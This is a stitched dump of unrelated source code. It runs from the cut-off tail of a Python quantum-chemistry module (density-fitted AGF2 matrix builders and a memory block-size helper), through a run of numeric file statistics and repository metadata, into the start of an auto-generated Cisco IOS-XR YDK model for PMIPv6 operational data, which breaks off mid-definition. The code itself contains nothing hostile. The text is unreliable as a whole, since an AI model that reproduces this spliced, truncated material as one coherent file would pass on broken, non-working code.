e_i.ctypes.data_as(ctypes.c_void_p),
e_I.ctypes.data_as(ctypes.c_void_p),
e_a.ctypes.data_as(ctypes.c_void_p),
e_A.ctypes.data_as(ctypes.c_void_p),
ctypes.c_double(os_factor),
ctypes.c_double(ss_factor),
ctypes.c_int(nmo),
ctypes.c_int(noa),
ctypes.c_int(nob),
ctypes.c_int(nva),
ctypes.c_int(nvb),
ctypes.c_int(naux),
ctypes.c_int(start),
ctypes.c_int(end),
vv.ctypes.data_as(ctypes.c_void_p),
vev.ctypes.data_as(ctypes.c_void_p))
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
def build_mats_dfuagf2_outcore(qxi, qja, e_occ, e_vir, os_factor=1.0, ss_factor=1.0):
''' Python version of AGF2udf_vv_vev_islice to support outcore
'''
naux = qxi[0].shape[0]
noa, nob = e_occ[0].size, e_occ[1].size
nva, nvb = e_vir[0].size, e_vir[1].size
nmo = qxi[0].size // (naux*noa)
assert qxi[0].size == (naux * nmo * noa)
assert qja[0].size == (naux * noa * nva)
assert qja[1].size == (naux * nob * nvb)
qxi_a, qxi_b = qxi
qja_a, qja_b = qja
vv = np.zeros((nmo, nmo))
vev = np.zeros((nmo, nmo))
fposa = ss_factor
fnega = -ss_factor
fposb = os_factor
eja_a = lib.direct_sum('j,a->ja', e_occ[0], -e_vir[0]).ravel()
eja_b = lib.direct_sum('j,a->ja', e_occ[1], -e_vir[1]).ravel()
buf = (np.zeros((nmo, noa*nva)),
np.zeros((nmo, nob*nvb)),
np.zeros((nmo*noa, nva)))
for i in mpi_helper.nrange(noa):
qx_a = qxi_a.reshape(naux, nmo, noa)[:,:,i]
xija_aa = lib.dot(qx_a.T, qja_a, c=buf[0])
xija_ab = lib.dot(qx_a.T, qja_b, c=buf[1])
xjia_aa = lib.dot(qxi_a.T, qja_a[:,i*nva:(i+1)*nva], c=buf[2])
xjia_aa = xjia_aa.reshape(nmo, -1)
eija_aa = eja_a + e_occ[0][i]
eija_ab = eja_b + e_occ[0][i]
vv = lib.dot(xija_aa, xija_aa.T, alpha=fposa, beta=1, c=vv)
vv = lib.dot(xija_aa, xjia_aa.T, alpha=fnega, beta=1, c=vv)
vv = lib.dot(xija_ab, xija_ab.T, alpha=fposb, beta=1, c=vv)
exija_aa = xija_aa * eija_aa[None]
exija_ab = xija_ab * eija_ab[None]
vev = lib.dot(exija_aa, xija_aa.T, alpha=fposa, beta=1, c=vev)
vev = lib.dot(exija_aa, xjia_aa.T, alpha=fnega, beta=1, c=vev)
vev = lib.dot(exija_ab, xija_ab.T, alpha=fposb, beta=1, c=vev)
vv = vv.reshape(nmo, nmo)
vev = vev.reshape(nmo, nmo)
mpi_helper.barrier()
mpi_helper.allreduce_safe_inplace(vv)
mpi_helper.allreduce_safe_inplace(vev)
return vv, vev
def get_blksize(max_memory_total, *sizes):
''' Gets a block size such that the sum of the product of
:attr:`sizes` with :attr:`blksize` is less than avail
memory.
If multiple tuples are provided, the maximum is used.
'''
if isinstance(sizes[0], tuple):
sum_of_sizes = max([sum(x) for x in sizes])
else:
sum_of_sizes = sum(sizes)
mem_avail = max_memory_total - lib.current_memory()[0]
mem_avail *= 8e6 # MB -> bits
sum_of_sizes *= 64 # number of 64-bit elements -> bits
return int(mem_avail / sum_of_sizes)
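# --- Sketch (assumption: illustrative only, not part of the original module) ---
# get_blksize answers "how many outer-loop indices fit in memory at once" given
# the per-index buffer sizes in elements, e.g. buffers of nmo*nva and nmo*noa
# doubles per occupied index under a 4000 MB ceiling:
def _blksize_demo(max_memory=4000, nmo=100, noa=20, nva=80):
    return get_blksize(max_memory, (nmo * nva, nmo * noa))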
| 30.331667
| 85
| 0.614869
| 3,077
| 18,199
| 3.428989
| 0.084823
| 0.063027
| 0.048905
| 0.073358
| 0.804284
| 0.786655
| 0.777557
| 0.751114
| 0.736328
| 0.733675
| 0
| 0.016437
| 0.234463
| 18,199
| 599
| 86
| 30.382304
| 0.740884
| 0.109512
| 0
| 0.805
| 0
| 0
| 0.013544
| 0.006054
| 0
| 0
| 0
| 0
| 0.0475
| 1
| 0.03
| false
| 0
| 0.01
| 0
| 0.07
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0 | 7 | f482d622367b65ba522d042e0ad906c70e578a43 | 294,370 | py | Python | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ip_mobileip_oper.py | Maikor/ydk-py | b86c4a7c570ae3b2c5557d098420446df5de4929 | [ "ECL-2.0", "Apache-2.0" ] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ip_mobileip_oper.py | Maikor/ydk-py | b86c4a7c570ae3b2c5557d098420446df5de4929 | [ "ECL-2.0", "Apache-2.0" ] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ip_mobileip_oper.py | Maikor/ydk-py | b86c4a7c570ae3b2c5557d098420446df5de4929 | [ "ECL-2.0", "Apache-2.0" ] | null | null | null |
""" Cisco_IOS_XR_ip_mobileip_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR ip\-mobileip package operational data.
This module contains definitions
for the following management objects\:
pmipv6\: Proxy Mobile IPv6
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Pmipv6Addr(Enum):
"""
Pmipv6Addr (Enum Class)
Address Types
.. data:: none = 0
None
.. data:: ipv4 = 1
IPV4 Address
.. data:: ipv6 = 2
IPV6 Address
.. data:: pmipv6_addr_ipv4_ipv6 = 3
Both IPV4 and IPV6 Address
"""
none = Enum.YLeaf(0, "none")
ipv4 = Enum.YLeaf(1, "ipv4")
ipv6 = Enum.YLeaf(2, "ipv6")
pmipv6_addr_ipv4_ipv6 = Enum.YLeaf(3, "pmipv6-addr-ipv4-ipv6")
class Pmipv6Encap(Enum):
"""
Pmipv6Encap (Enum Class)
ENCAP Types
.. data:: none = 0
None
.. data:: ipv6 = 1
IPV6 Tunnel
.. data:: ipv6_ipv4 = 2
IPV6 in IPV4 Tunnel
.. data:: ipv6_udp = 3
IPV6 in IPV4 UDP Tunnel
.. data:: gre_ipv4 = 4
GRE IPV4 Tunnel
.. data:: gre_ipv6 = 5
GRE IPV6 Tunnel
.. data:: gre = 6
GRE Tunnel
.. data:: mgre_ipv4 = 7
MGRE IPV4 Tunnel
.. data:: mgre_ipv6 = 8
MGRE IPV6 Tunnel
.. data:: mip_udp = 9
MIP UDP Tunnel
.. data:: mip_mudp = 10
MIP MUDP Tunnel
.. data:: max = 11
MAX Encap Type
"""
none = Enum.YLeaf(0, "none")
ipv6 = Enum.YLeaf(1, "ipv6")
ipv6_ipv4 = Enum.YLeaf(2, "ipv6-ipv4")
ipv6_udp = Enum.YLeaf(3, "ipv6-udp")
gre_ipv4 = Enum.YLeaf(4, "gre-ipv4")
gre_ipv6 = Enum.YLeaf(5, "gre-ipv6")
gre = Enum.YLeaf(6, "gre")
mgre_ipv4 = Enum.YLeaf(7, "mgre-ipv4")
mgre_ipv6 = Enum.YLeaf(8, "mgre-ipv6")
mip_udp = Enum.YLeaf(9, "mip-udp")
mip_mudp = Enum.YLeaf(10, "mip-mudp")
max = Enum.YLeaf(11, "max")
class Pmipv6Role(Enum):
"""
Pmipv6Role (Enum Class)
PMIPV6 Role Types
.. data:: wlan = 0
WLAN
.. data:: gpp = 1
3GPP
.. data:: lte = 2
LTE
.. data:: wi_max = 3
WiMAX
.. data:: gma = 4
3GMA
.. data:: rmax = 5
MAX Role
"""
wlan = Enum.YLeaf(0, "wlan")
gpp = Enum.YLeaf(1, "gpp")
lte = Enum.YLeaf(2, "lte")
wi_max = Enum.YLeaf(3, "wi-max")
gma = Enum.YLeaf(4, "gma")
rmax = Enum.YLeaf(5, "rmax")
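# --- Usage sketch (assumption: illustrative only, not part of the generated model) ---
# The operational model below is typically read back from a device with the
# standard ydk-py CRUD pattern; the connection details here are placeholders.
def _read_pmipv6_oper(address, username, password):
    from ydk.services import CRUDService
    from ydk.providers import NetconfServiceProvider
    provider = NetconfServiceProvider(address=address, username=username, password=password)
    crud = CRUDService()
    # read the whole Cisco-IOS-XR-ip-mobileip-oper:pmipv6 subtree
    return crud.read(provider, Pmipv6())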
class Pmipv6(Entity):
"""
Proxy Mobile IPv6
.. attribute:: lma
None
**type**\: :py:class:`Lma <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6, self).__init__()
self._top_entity = None
self.yang_name = "pmipv6"
self.yang_parent_name = "Cisco-IOS-XR-ip-mobileip-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("lma", ("lma", Pmipv6.Lma))])
self._leafs = OrderedDict()
self.lma = Pmipv6.Lma()
self.lma.parent = self
self._children_name_map["lma"] = "lma"
self._segment_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6, [], name, value)
class Lma(Entity):
"""
None
.. attribute:: statistics
None
**type**\: :py:class:`Statistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics>`
.. attribute:: bindings
Table of Binding
**type**\: :py:class:`Bindings <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Bindings>`
.. attribute:: heartbeats
Table of Heartbeat
**type**\: :py:class:`Heartbeats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Heartbeats>`
.. attribute:: config_variables
Global Configuration Variables
**type**\: :py:class:`ConfigVariables <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.ConfigVariables>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma, self).__init__()
self.yang_name = "lma"
self.yang_parent_name = "pmipv6"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("statistics", ("statistics", Pmipv6.Lma.Statistics)), ("bindings", ("bindings", Pmipv6.Lma.Bindings)), ("heartbeats", ("heartbeats", Pmipv6.Lma.Heartbeats)), ("config-variables", ("config_variables", Pmipv6.Lma.ConfigVariables))])
self._leafs = OrderedDict()
self.statistics = Pmipv6.Lma.Statistics()
self.statistics.parent = self
self._children_name_map["statistics"] = "statistics"
self.bindings = Pmipv6.Lma.Bindings()
self.bindings.parent = self
self._children_name_map["bindings"] = "bindings"
self.heartbeats = Pmipv6.Lma.Heartbeats()
self.heartbeats.parent = self
self._children_name_map["heartbeats"] = "heartbeats"
self.config_variables = Pmipv6.Lma.ConfigVariables()
self.config_variables.parent = self
self._children_name_map["config_variables"] = "config-variables"
self._segment_path = lambda: "lma"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma, [], name, value)
class Statistics(Entity):
"""
None
.. attribute:: customer_statistics
Table of CustomerStatistics
**type**\: :py:class:`CustomerStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics>`
.. attribute:: license
LMA License Statistics
**type**\: :py:class:`License <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.License>`
.. attribute:: global_
Global Statistics
**type**\: :py:class:`Global <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.Global>`
.. attribute:: mag_statistics
Table of MAGStatistics
**type**\: :py:class:`MagStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.MagStatistics>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics, self).__init__()
self.yang_name = "statistics"
self.yang_parent_name = "lma"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("customer-statistics", ("customer_statistics", Pmipv6.Lma.Statistics.CustomerStatistics)), ("license", ("license", Pmipv6.Lma.Statistics.License)), ("global", ("global_", Pmipv6.Lma.Statistics.Global)), ("mag-statistics", ("mag_statistics", Pmipv6.Lma.Statistics.MagStatistics))])
self._leafs = OrderedDict()
self.customer_statistics = Pmipv6.Lma.Statistics.CustomerStatistics()
self.customer_statistics.parent = self
self._children_name_map["customer_statistics"] = "customer-statistics"
self.license = Pmipv6.Lma.Statistics.License()
self.license.parent = self
self._children_name_map["license"] = "license"
self.global_ = Pmipv6.Lma.Statistics.Global()
self.global_.parent = self
self._children_name_map["global_"] = "global"
self.mag_statistics = Pmipv6.Lma.Statistics.MagStatistics()
self.mag_statistics.parent = self
self._children_name_map["mag_statistics"] = "mag-statistics"
self._segment_path = lambda: "statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics, [], name, value)
class CustomerStatistics(Entity):
"""
Table of CustomerStatistics
.. attribute:: customer_statistic
Customer statistics
**type**\: list of :py:class:`CustomerStatistic <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics, self).__init__()
self.yang_name = "customer-statistics"
self.yang_parent_name = "statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("customer-statistic", ("customer_statistic", Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic))])
self._leafs = OrderedDict()
self.customer_statistic = YList(self)
self._segment_path = lambda: "customer-statistics"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics, [], name, value)
class CustomerStatistic(Entity):
"""
Customer statistics
.. attribute:: customer_name (key)
Customer Name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: protocol_statistics
LMA Protocol Statistics
**type**\: :py:class:`ProtocolStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics>`
.. attribute:: accounting_statistics
LMA Accounting Statistics
**type**\: :py:class:`AccountingStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.AccountingStatistics>`
.. attribute:: lma_identifier
LMA Identifier
**type**\: str
.. attribute:: bce_count
Count of Bindings
**type**\: int
**range:** 0..4294967295
.. attribute:: handoff_count
Count of Handoffs
**type**\: int
**range:** 0..4294967295
.. attribute:: ipv4_mnp_count
Count of IPv4 Mobile Node Prefixes
**type**\: int
**range:** 0..4294967295
.. attribute:: ipv6_mnp_count
Count of IPv6 Mobile Node Prefixes
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic, self).__init__()
self.yang_name = "customer-statistic"
self.yang_parent_name = "customer-statistics"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['customer_name']
self._child_classes = OrderedDict([("protocol-statistics", ("protocol_statistics", Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics)), ("accounting-statistics", ("accounting_statistics", Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.AccountingStatistics))])
self._leafs = OrderedDict([
('customer_name', (YLeaf(YType.str, 'customer-name'), ['str'])),
('lma_identifier', (YLeaf(YType.str, 'lma-identifier'), ['str'])),
('bce_count', (YLeaf(YType.uint32, 'bce-count'), ['int'])),
('handoff_count', (YLeaf(YType.uint32, 'handoff-count'), ['int'])),
('ipv4_mnp_count', (YLeaf(YType.uint32, 'ipv4-mnp-count'), ['int'])),
('ipv6_mnp_count', (YLeaf(YType.uint32, 'ipv6-mnp-count'), ['int'])),
])
self.customer_name = None
self.lma_identifier = None
self.bce_count = None
self.handoff_count = None
self.ipv4_mnp_count = None
self.ipv6_mnp_count = None
self.protocol_statistics = Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics()
self.protocol_statistics.parent = self
self._children_name_map["protocol_statistics"] = "protocol-statistics"
self.accounting_statistics = Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.AccountingStatistics()
self.accounting_statistics.parent = self
self._children_name_map["accounting_statistics"] = "accounting-statistics"
self._segment_path = lambda: "customer-statistic" + "[customer-name='" + str(self.customer_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-mobileip-oper:pmipv6/lma/statistics/customer-statistics/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic, ['customer_name', 'lma_identifier', 'bce_count', 'handoff_count', 'ipv4_mnp_count', 'ipv6_mnp_count'], name, value)
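# A hedged sketch (not generated code): iterating the per-customer statistics
# list after a CRUD read; 'pmipv6' is assumed to be the entity returned by
# CRUDService.read as in the sketch above.
#
#   for entry in pmipv6.lma.statistics.customer_statistics.customer_statistic:
#       # each entry is keyed by customer_name and carries binding/handoff counters
#       print(entry.customer_name, entry.bce_count, entry.handoff_count)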
class ProtocolStatistics(Entity):
"""
LMA Protocol Statistics
.. attribute:: pbu_receive_statistics
PBU Receive Statistics
**type**\: :py:class:`PbuReceiveStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbuReceiveStatistics>`
.. attribute:: pba_send_statistics
PBA Send Statistics
**type**\: :py:class:`PbaSendStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbaSendStatistics>`
.. attribute:: pbri_send_statistics
PBRI Send Statistics
**type**\: :py:class:`PbriSendStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriSendStatistics>`
.. attribute:: pbri_receive_statistics
PBRI Receive Statistics
**type**\: :py:class:`PbriReceiveStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriReceiveStatistics>`
.. attribute:: pbra_send_statistics
PBRA Send Statistics
**type**\: :py:class:`PbraSendStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraSendStatistics>`
.. attribute:: pbra_receive_statistics
PBRA Receive Statistics
**type**\: :py:class:`PbraReceiveStatistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_mobileip_oper.Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraReceiveStatistics>`
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics, self).__init__()
self.yang_name = "protocol-statistics"
self.yang_parent_name = "customer-statistic"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("pbu-receive-statistics", ("pbu_receive_statistics", Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbuReceiveStatistics)), ("pba-send-statistics", ("pba_send_statistics", Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbaSendStatistics)), ("pbri-send-statistics", ("pbri_send_statistics", Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriSendStatistics)), ("pbri-receive-statistics", ("pbri_receive_statistics", Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriReceiveStatistics)), ("pbra-send-statistics", ("pbra_send_statistics", Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraSendStatistics)), ("pbra-receive-statistics", ("pbra_receive_statistics", Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraReceiveStatistics))])
self._leafs = OrderedDict()
self.pbu_receive_statistics = Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbuReceiveStatistics()
self.pbu_receive_statistics.parent = self
self._children_name_map["pbu_receive_statistics"] = "pbu-receive-statistics"
self.pba_send_statistics = Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbaSendStatistics()
self.pba_send_statistics.parent = self
self._children_name_map["pba_send_statistics"] = "pba-send-statistics"
self.pbri_send_statistics = Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriSendStatistics()
self.pbri_send_statistics.parent = self
self._children_name_map["pbri_send_statistics"] = "pbri-send-statistics"
self.pbri_receive_statistics = Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbriReceiveStatistics()
self.pbri_receive_statistics.parent = self
self._children_name_map["pbri_receive_statistics"] = "pbri-receive-statistics"
self.pbra_send_statistics = Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraSendStatistics()
self.pbra_send_statistics.parent = self
self._children_name_map["pbra_send_statistics"] = "pbra-send-statistics"
self.pbra_receive_statistics = Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbraReceiveStatistics()
self.pbra_receive_statistics.parent = self
self._children_name_map["pbra_receive_statistics"] = "pbra-receive-statistics"
self._segment_path = lambda: "protocol-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics, [], name, value)
class PbuReceiveStatistics(Entity):
"""
PBU Receive Statistics
.. attribute:: pbu_count
Count of PBUs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pbu_drop_count
Count of PBUs Dropped
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbuReceiveStatistics, self).__init__()
self.yang_name = "pbu-receive-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pbu_count', (YLeaf(YType.uint64, 'pbu-count'), ['int'])),
('pbu_drop_count', (YLeaf(YType.uint32, 'pbu-drop-count'), ['int'])),
])
self.pbu_count = None
self.pbu_drop_count = None
self._segment_path = lambda: "pbu-receive-statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbuReceiveStatistics, ['pbu_count', 'pbu_drop_count'], name, value)
class PbaSendStatistics(Entity):
"""
PBA Send Statistics
.. attribute:: pba_count
Count of PBAs
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pba_drop_count
Count of PBAs dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: accepted_count
Count of Status Code \- Binding Update accepted
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_count
Count of Status Code \- Last BA status code sent
**type**\: int
**range:** 0..4294967295
.. attribute:: unspecified_failure_count
Count of Status Code \- Reason unspecified
**type**\: int
**range:** 0..4294967295
.. attribute:: admin_failure_count
Count of Status Code \- Administratively prohibited
**type**\: int
**range:** 0..4294967295
.. attribute:: resource_failure_count
Count of Status Code \- Insufficient resources
**type**\: int
**range:** 0..4294967295
.. attribute:: home_reg_failure_count
Count of Status Code \- Home registration not supported
**type**\: int
**range:** 0..4294967295
.. attribute:: home_subnet_failure_count
Count of Status Code \- Not home subnet
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_sequence_failure_count
Count of Status Code \- Sequence number out of window
**type**\: int
**range:** 0..4294967295
.. attribute:: reg_type_failure_count
Count of Status Code \- Registration type change
**type**\: int
**range:** 0..4294967295
.. attribute:: authen_failure_count
Count of Status Code \- Auth Fail
**type**\: int
**range:** 0..4294967295
.. attribute:: proxy_reg_not_enabled_count
Count of Status Code \- Proxy Registration not enabled
**type**\: int
**range:** 0..4294967295
.. attribute:: not_lma_for_this_mn_count
Count of Status Code \- Not LMA for this Mobile Node
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_proxy_reg_count
Count of Status Code \- MAG not authorized for proxy registration
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_hnp_count
Count of Status Code \- Not authorized for HNP
**type**\: int
**range:** 0..4294967295
.. attribute:: timestamp_mismatch_count
Count of Status Code \- Invalid timestamp value
**type**\: int
**range:** 0..4294967295
.. attribute:: timestamp_lower_than_previous_accepted_count
Count of Status Code \- Timestamp lower than previous accepted
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_hnp_opt_count
Count of Status Code \- Missing Home Network Prefix option
**type**\: int
**range:** 0..4294967295
.. attribute:: received_hnps_do_not_match_bce_hnps_count
Count of Status Code \- Received HNPs do not match with BCE
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_mn_id_opt_count
Count of Status Code \- Missing MN identifier option
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_hi_opt_count
Count of Status Code \- Missing Handoff Indicator
**type**\: int
**range:** 0..4294967295
.. attribute:: missing_access_tech_type_opt_count
Count of Status Code \- Missing ATT option
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_ipv4_mobility_count
Count of Status Code \- Not authorized for IPv4 mobility
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_ipv4_hoa_count
Count of Status Code \- Not authorized for IPv4 HoA
**type**\: int
**range:** 0..4294967295
.. attribute:: no_author_for_ipv6_mobility_count
Count of Status Code \- Not authorized for IPv6 mobility
**type**\: int
**range:** 0..4294967295
.. attribute:: multiple_ipv4_ho_a_not_supported_count
Count of Status Code \- Multiple IPv4 HoA not supported
**type**\: int
**range:** 0..4294967295
.. attribute:: gre_key_opt_required_count
Count of Status Code \- GRE Key option is required
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ip-mobileip-oper'
_revision = '2016-03-10'
def __init__(self):
super(Pmipv6.Lma.Statistics.CustomerStatistics.CustomerStatistic.ProtocolStatistics.PbaSendStatistics, self).__init__()
self.yang_name = "pba-send-statistics"
self.yang_parent_name = "protocol-statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('pba_count', (YLeaf(YType.uint64, 'pba-count'), ['int'])),
('pba_drop_count', (YLeaf(YType.uint32, 'pba-drop-count'), ['int'])),
('accepted_count', (YLeaf(YType.uint32, 'accepted-count'), ['int'])),
('unknown_count', (YLeaf(YType.uint32, 'unknown-count'), ['int'])),
('unspecified_failure_count', (YLeaf(YType.uint32, 'unspecified-failure-count'), ['int'])),
('admin_failure_count', (YLeaf(YType.uint32, 'admin-failure-count'), ['int'])),
('resource_failure_count', (YLeaf(YType.uint32, 'resource-failure-count'), ['int'])),
('home_reg_failure_count', (YLeaf(YType.uint32, 'home-reg-failure-count'), ['int'])),
('home_subnet_failure_count', (YLeaf(YType.uint32, 'home-subnet-failure-count'), ['int'])),
('bad_sequence_failure_count', (YLeaf(YType.uint32, 'bad-sequence-failure-count'), ['int'])),
('reg_type_failure_count', (YLeaf(YType.uint32, 'reg-type-failure-count'), ['int'])),
('authen_failure_count', (YLeaf(YType.uint32, 'authen-failure-count'), ['int'])),
('proxy_reg_not_enabled_count', (YLeaf(YType.uint32, 'proxy-reg-not-enabled-count'), ['int'])),
('not_lma_for_this_mn_count', (YLeaf(YType.uint32, 'not-lma-for-this-mn-count'), ['int'])),
('no_author_for_proxy_reg_count', (YLeaf(YType.uint32, 'no-author-for-proxy-reg-count'), ['int'])),
('no_author_for_hnp_count', (YLeaf(YType.uint32, 'no-author-for-hnp-count'), ['int'])),
('timestamp_mismatch_count', (YLeaf(YType.uint32, 'timestamp-mismatch-count'), ['int'])),
